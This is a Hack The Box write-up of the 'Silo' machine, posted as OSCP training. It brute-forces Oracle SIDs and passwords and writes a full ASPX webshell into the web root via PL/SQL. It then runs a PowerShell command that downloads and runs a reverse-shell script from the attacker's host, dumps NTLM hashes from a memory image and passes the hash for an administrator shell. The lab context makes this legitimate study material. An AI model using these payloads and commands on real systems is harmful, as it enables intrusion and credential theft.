- Febr

2020

Posted by: Ángel Guzmán

[Cybersecurity & hacking tools and techniques]

Road to OSCP - Hack The Box Write Up - Silo

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Silo

Initial Foothold

Nmap shows that there is an oracle listener on port: 1521 with version: 11.2.0.2.0. A quick google search tells us that this version is vulnerable to exploit with RCE: CVE-2012-1675.

This page talks about exploiting using a tool called `odat (Oracle Database Attacking Tool).

We can use this command odat tnspoison -s $SERVER -d $ID --test-module to test if the target is vulnerable. However, we first need the $ID (Oracle System ID).

Thankfully, with odat -h we find it has a sidguesser module: odat sidguesser -s 10.10.10.82.

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
100% |######################################################################################################################################################################################################################| Time: 00:02:20
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |######################################################################################################################################################################################################################| Time: 00:00:04
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |######################################################################################################################################################################################################################| Time: 00:02:07
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

So, now we can execute the command to see if its vulnerable: odat tnspoison -s 10.10.10.82 -d XE --test-module

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

Time to exploit it: odat tnspoison -s 10.10.10.82 -d XE --poison. Unfortunately, the script is fucked due to the recent port to Python 3. Trying the Python 2 version did not work either.

Find Another Path

Let's try to guess the database's password: odat passwordguesser -s 10.10.10.82 -d XE.

Does not work, if we take a look at the default wordlist /usr/share/odat/accounts/accounts.txt, everything is uppercase. However, this article says that they are case sensitive.

After a million attempts, the solution is:

Get a better wordlist from Seclists.
Substitute the : for /.
Use a Vim macro to clone each line to lower case.

We find the credentials: scott/tiger.

Connect to the databse using sqlplus: sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba

User

Our objective is to write an aspx webshell using sqlplus. For that, grab an aspx shell: /usr/share/webshells/aspx/cmdasp.aspx.

Apparently Oracle is very picky about how we write files, it has to be less than 1000 characters and in 1 line.

So, we delete some comments and styles. Then use sed -z 's/\n//g' cmdasp.aspx to get it in 1 line. The final payload looks like this:

declare
    f utl_file.file_type;
    s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
    f:= utl_file.fopen('/inetpub/wwwroot', 'peng.aspx', 'W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/

After that, if we navigate to 10.10.10.82/peng.aspx we should be able to find a webshell.

Reverse Shell

Grab a powershell reverse shell: cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ..
Rename it: mv Invoke-PowerShellTcp.ps1 shell.ps1.
Add to the bottom: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 6969.
Set up a listener: ncat -lnvp 6969.
Set up HTTP server: python3 -m http.server.
On the webshell: powershell -ExecutionPolicy Bypass "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.14:8000/shell.ps1')".

And we get a shell as iis apppool\defaultapppool.

Root

There is a weird file called Oracle issue.txt on Phineas' Desktop. It has a dropbox link and a password.

Apparently, the password is not being displayed correctly due to our scuffed shell. Convert it to base64 and decode it on Kali:

$fc = Get-Content "Oracle issue.txt"
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
[System.Convert]::ToBase64String($fe)

Decode it: echo -n "U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVtcCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRvciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bib3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZzemI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk" | base64 -d

The actual password is: £%Hm8646uC$.

We get a memory dump: SILO-20180105-221806.dmp. We can use volatitlity to analyze it.

Diving Into the Dump

Volatility requires that we specify a profile in order to analyze the dump. If we run systeminfo from our reverse shell, we see that it is a 64 bits Windows Server 2012.

So, with that information, we can get hashdump using the following command: volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::

And with that, we can do a pass-hash-attack to get a shell: pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd

And we get a shell as: silo\administrator.